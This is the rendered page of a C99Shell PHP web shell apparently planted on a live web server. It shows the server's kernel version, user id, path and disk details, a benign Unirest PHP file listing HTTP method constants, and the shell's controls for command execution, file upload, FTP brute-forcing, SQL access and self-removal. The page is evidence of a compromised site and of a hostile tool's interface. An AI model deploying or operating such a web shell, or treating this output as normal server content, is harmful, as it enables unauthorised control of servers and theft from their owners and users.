!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/mashape/unirest-php/src/Unirest/   drwxr-xr-x
Free 29.21 GB of 117.98 GB (24.76%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Method.php (1.55 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Hypertext Transfer Protocol (HTTP) Method Registry
 *
 * http://www.iana.org/assignments/http-methods/http-methods.xhtml
 */

namespace Unirest;

interface 
Method
{
    
// RFC7231
    
const GET 'GET';
    const 
HEAD 'HEAD';
    const 
POST 'POST';
    const 
PUT 'PUT';
    const 
DELETE 'DELETE';
    const 
CONNECT 'CONNECT';
    const 
OPTIONS 'OPTIONS';
    const 
TRACE 'TRACE';

    
// RFC3253
    
const BASELINE 'BASELINE';

    
// RFC2068
    
const LINK 'LINK';
    const 
UNLINK 'UNLINK';

    
// RFC3253
    
const MERGE 'MERGE';
    const 
BASELINECONTROL 'BASELINE-CONTROL';
    const 
MKACTIVITY 'MKACTIVITY';
    const 
VERSIONCONTROL 'VERSION-CONTROL';
    const 
REPORT 'REPORT';
    const 
CHECKOUT 'CHECKOUT';
    const 
CHECKIN 'CHECKIN';
    const 
UNCHECKOUT 'UNCHECKOUT';
    const 
MKWORKSPACE 'MKWORKSPACE';
    const 
UPDATE 'UPDATE';
    const 
LABEL 'LABEL';

    
// RFC3648
    
const ORDERPATCH 'ORDERPATCH';

    
// RFC3744
    
const ACL 'ACL';

    
// RFC4437
    
const MKREDIRECTREF 'MKREDIRECTREF';
    const 
UPDATEREDIRECTREF 'UPDATEREDIRECTREF';

    
// RFC4791
    
const MKCALENDAR 'MKCALENDAR';

    
// RFC4918
    
const PROPFIND 'PROPFIND';
    const 
LOCK 'LOCK';
    const 
UNLOCK 'UNLOCK';
    const 
PROPPATCH 'PROPPATCH';
    const 
MKCOL 'MKCOL';
    const 
COPY 'COPY';
    const 
MOVE 'MOVE';

    
// RFC5323
    
const SEARCH 'SEARCH';

    
// RFC5789
    
const PATCH 'PATCH';

    
// RFC5842
    
const BIND 'BIND';
    const 
UNBIND 'UNBIND';
    const 
REBIND 'REBIND';
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--